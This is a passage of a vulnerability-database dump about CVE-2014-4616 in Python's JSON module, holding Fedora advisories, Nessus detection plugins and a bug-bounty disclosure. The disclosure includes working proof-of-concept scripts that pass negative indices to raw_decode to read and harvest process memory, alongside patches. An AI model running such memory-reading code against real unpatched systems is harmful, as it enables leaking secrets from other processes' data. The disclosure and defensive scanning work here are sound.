"integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2014-07-17T04:28:18", "id": "FEDORA:4FCC221CAB", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-09T15:45:22", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python3-3.3.2-18.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-09T15:45:22", "id": "FEDORA:E272360D99E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-13T18:14:28", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-10.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-13T18:14:28", "id": "FEDORA:79A3360CE877", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bounty": 1500.0, "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking.\n\nThe sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\n\nLet me clarify:\n\nThis is Python-3.4.0/Modules/_json.c:\n\n```\n1035 static PyObject *\n1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)\n1037 {\n1038 /* Python callable interface to scan_once_{str,unicode} */\n1039 PyObject *pystr;\n1040 PyObject *rval;\n1041 Py_ssize_t idx;\n1042 Py_ssize_t next_idx = -1;\n1043 static char *kwlist[] = {\"string\", \"idx\", NULL};\n1044 PyScannerObject *s;\n1045 assert(PyScanner_Check(self));\n1046 s = (PyScannerObject *)self;\n1047 if (!PyArg_ParseTupleAndKeywords(args, kwds, \"On:scan_once\", kwlist, &pystr, &idx))\n1048 return NULL;\n1049\n1050 if (PyUnicode_Check(pystr)) {\n1051 rval = scan_once_unicode(s, pystr, idx, &next_idx);\n1052 }\n1053 else {\n1054 PyErr_Format(PyExc_TypeError,\n1055 \"first argument must be a string, not %.80s\",\n1056 Py_TYPE(pystr)->tp_name);\n1057 return NULL;\n1058 }\n1059 PyDict_Clear(s->memo);\n1060 if (rval == NULL)\n1061 return NULL;\n1062 return _build_rval_index_tuple(rval, next_idx);\n1063 }\n```\n\nAs you can see on line 1047, ParseTuple takes an 'n' as an argument for 'end', which, as can be learned from this page ( https://docs.python.org/3/c-api/arg.html ), means:\n\n```\n n (int) [Py_ssize_t]\n Convert a Python integer to a C Py_ssize_t.\n```\n\nThis means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'end' parameter.\n\nThen onto scanstring_unicode_once to which execution gets transferred through line 1051 of the code above.\n\n```\n922 static PyObject *\n923 scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t\nidx, Py_ssize_t *next_idx_ptr)\n924 {\n925 /* Read one JSON term (of any kind) from PyUnicode pystr.\n926 idx is the index of the first character of the term\n927 *next_idx_ptr is a return-by-reference index to the first character after\n928 the number.\n929\n930 Returns a new PyObject representation of the term.\n931 */\n932 PyObject *res;\n933 void *str;\n934 int kind;\n935 Py_ssize_t length;\n936\n937 if (PyUnicode_READY(pystr) == -1)\n938 return NULL;\n939\n940 str = PyUnicode_DATA(pystr);\n941 kind = PyUnicode_KIND(pystr);\n942 length = PyUnicode_GET_LENGTH(pystr);\n943\n944 if (idx >= length) {\n945 raise_stop_iteration(idx);\n946 return NULL;\n947 }\n```\n\nHere we see that 'length' is set to the length of the string parameter. This will always be a positive value. On line 945 it is checked whether idx is equal or higher than length; this can never be true in the case of a negative index value.\n\n```\n949 switch (PyUnicode_READ(kind, str, idx)) {\n```\n\nPyUnicode_READ is defined as follows ( in Python-3.4.0/Include/unicodeobject.h ):\n\n```\n516 /* Read a code point from the string's canonical representation. No checks\n517 or ready calls are performed. */\n518 #define PyUnicode_READ(kind, data, index) \\\n519 ((Py_UCS4) \\\n520 ((kind) == PyUnicode_1BYTE_KIND ? \\\n521 ((const Py_UCS1 *)(data))[(index)] : \\\n522 ((kind) == PyUnicode_2BYTE_KIND ? \\\n523 ((const Py_UCS2 *)(data))[(index)] : \\\n524 ((const Py_UCS4 *)(data))[(index)] \\\n525 ) \\\n526 ))\n```\n\nHere we can see that index, which is negative in our example, is used as an array index. Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'.\n\nSo, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] will effectively point to an invalid or read-protected page in memory, the Python executable will segfault.\n\nBut there's more. Instead of making it point to an invalid page, let's make it point to something valid:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"99448866\"\n4 b = \"88445522\"\n5 diff = id(a) - id(b)\n6 print(\"Difference is \" + hex(diff))\n7 print j.raw_decode(b)\n8 print j.raw_decode(b, diff)\n```\n\nOutput of this script is:\n\nDifference is -0x30\n(88445522, 8)\n(99448866, -40)\n\nThe difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function.\nInternally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter.\n\nWe can use this harvester to scan memory for valid JSON strings:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"x\" * 1000\n4 for x in range(0, 600000):\n5 try:\n6 print j.raw_decode(a, 0 - x)\n7 except:\n8 pass\n```\n\nThere is one drawback, however. We cannot decode strings in this manner because:\n\n```\n296 static PyObject *\n297 scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict, Py_ssize_t *next_end_ptr)\n298 {\n299 /* Read the JSON string from PyUnicode pystr.\n300 end is the index of the first character after the quote.\n301 if strict is zero then literal control characters are allowed\n302 *next_end_ptr is a return-by-reference index of the character\n303 after the end quote\n304\n305 Return value is a new PyUnicode\n306 */\n307 PyObject *rval = NULL;\n308 Py_ssize_t len;\n309 Py_ssize_t begin = end - 1;\n310 Py_ssize_t next /* = begin */;\n311 const void *buf;\n312 int kind;\n313 PyObject *chunks = NULL;\n314 PyObject *chunk = NULL;\n315\n316 if (PyUnicode_READY(pystr) == -1)\n317 return 0;\n318\n319 len = PyUnicode_GET_LENGTH(pystr);\n320 buf = PyUnicode_DATA(pystr);\n321 kind = PyUnicode_KIND(pystr);\n322\n323 if (end < 0 || len < end) {\n324 PyErr_SetString(PyExc_ValueError, \"end is out of bounds\");\n325 goto bail;\n```\n\nthis code actually performs a bounds check by asserting that end (which is our index) isn't negative.\n\nHowever, I succesfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] ) from the process memory without any problem or difficulty.\n\nGiven the ubiquity of JSON parsing in Python applications and the limited amount of prequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases.\n\nHere is a patch for 3.4.0:\n\n```\n--- _json_old.c 2014-04-12 17:47:08.749012372 +0200\n+++ _json.c 2014-04-12 17:44:52.253011645 +0200\n@@ -941,7 +941,7 @@\n kind = PyUnicode_KIND(pystr);\n length = PyUnicode_GET_LENGTH(pystr);\n\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n raise_stop_iteration(idx);\n return NULL;\n }\n```\n\nAnd here is a patch for 2.7.6:\n\n```\n--- _json_old.c 2014-04-12 17:57:14.365015601 +0200\n+++ _json.c 2014-04-12 18:04:25.149017898 +0200\n@@ -1491,7 +1491,7 @@\n PyObject *res;\n char *str = PyString_AS_STRING(pystr);\n Py_ssize_t length = PyString_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n@@ -1578,7 +1578,7 @@\n PyObject *res;\n Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);\n Py_ssize_t length = PyUnicode_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n```\n\n\nHere is a script that checks whether the Python binary that executes it is vulnerable:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3\n4 a = '128931233'\n5 b = \"472389423\"\n6\n7 if id(a) < id(b):\n8 x = a\n9 y = b\n10 else:\n11 x = b\n12 y = a\n13\n14 diff = id(x) - id(y)\n15\n16 try:\n17 j.raw_decode(y, diff)\n18 print(\"Vulnerable\")\n19 except:\n20 print(\"Not vulnerable\")\n```\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-05-16T23:14:13", "type": "hackerone", "title": "Python (IBB): Python vulnerability: reading arbitrary process memory", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-20T05:54:36", "id": "H1:12297", "href": "https://hackerone.com/reports/12297", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2022-04-16T14:07:47", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-17T00:00:00", "type": "nessus", "title": "Fedora 19 : python3-3.3.2-9.fc19 (2014-8035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-8035.NASL", "href": "https://www.tenable.com/plugins/nessus/76540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-8035.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-9.fc19 (2014-8035)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?94088bd1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-9.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:04", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-17T00:00:00", "type": "nessus", "title": "Fedora 19 : python-2.7.5-13.fc19 (2014-7772)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-7772.NASL", "href": "https://www.tenable.com/plugins/nessus/76539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7772.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76539);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n\n script_name(english:\"Fedora 19 : python-2.7.5-13.fc19 (2014-7772)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb633cbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python-2.7.5-13.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:09", "description": "python and python3 were updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Missing boundary check in JSON module (CVE-2014-4616)", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-14T00:00:00", "type": "nessus", "title": "openSUSE Security Update : python / python3 (openSUSE-SU-2014:0890-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpython2_7-1_0", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libpython3_3m1_0", "p-cpe:/a:novell:opensuse:libpython3_3m1_0-32bit", "p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo", "p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python", "p-cpe:/a:novell:opensuse:python-32bit", "p-cpe:/a:novell:opensuse:python-base", "p-cpe:/a:novell:opensuse:python-base-32bit", "p-cpe:/a:novell:opensuse:python-base-debuginfo", "p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python-base-debugsource", "p-cpe:/a:novell:opensuse:python-curses", "p-cpe:/a:novell:opensuse:python-curses-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python-debugsource", "p-cpe:/a:novell:opensuse:python-demo", "p-cpe:/a:novell:opensuse:python-devel", "p-cpe:/a:novell:opensuse:python-doc-pdf", "p-cpe:/a:novell:opensuse:python-gdbm", "p-cpe:/a:novell:opensuse:python-gdbm-debuginfo", "p-cpe:/a:novell:opensuse:python-idle", "p-cpe:/a:novell:opensuse:python-tk", "p-cpe:/a:novell:opensuse:python-tk-debuginfo", "p-cpe:/a:novell:opensuse:python-xml", "p-cpe:/a:novell:opensuse:python-xml-debuginfo", "p-cpe:/a:novell:opensuse:python3", "p-cpe:/a:novell:opensuse:python3-32bit", "p-cpe:/a:novell:opensuse:python3-base", "p-cpe:/a:novell:opensuse:python3-base-32bit", "p-cpe:/a:novell:opensuse:python3-base-debuginfo", "p-cpe:/a:novell:opensuse:python3-base-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python3-base-debugsource", "p-cpe:/a:novell:opensuse:python3-curses", "p-cpe:/a:novell:opensuse:python3-curses-debuginfo", "p-cpe:/a:novell:opensuse:python3-dbm", "p-cpe:/a:novell:opensuse:python3-dbm-debuginfo", "p-cpe:/a:novell:opensuse:python3-debuginfo", "p-cpe:/a:novell:opensuse:python3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python3-debugsource", "p-cpe:/a:novell:opensuse:python3-devel", "p-cpe:/a:novell:opensuse:python3-devel-debuginfo", "p-cpe:/a:novell:opensuse:python3-doc-pdf", "p-cpe:/a:novell:opensuse:python3-idle", "p-cpe:/a:novell:opensuse:python3-testsuite", "p-cpe:/a:novell:opensuse:python3-testsuite-debuginfo", "p-cpe:/a:novell:opensuse:python3-tk", "p-cpe:/a:novell:opensuse:python3-tk-debuginfo", "p-cpe:/a:novell:opensuse:python3-tools", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-458.NASL", "href": "https://www.tenable.com/plugins/nessus/76488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-458.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76488);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4616\");\n\n script_name(english:\"openSUSE Security Update : python / python3 (openSUSE-SU-2014:0890-1)\");\n script_summary(english:\"Check for the openSUSE-2014-458 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"python and python3 were updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Missing boundary check in JSON module (CVE-2014-4616)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=884075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-07/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python / python3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 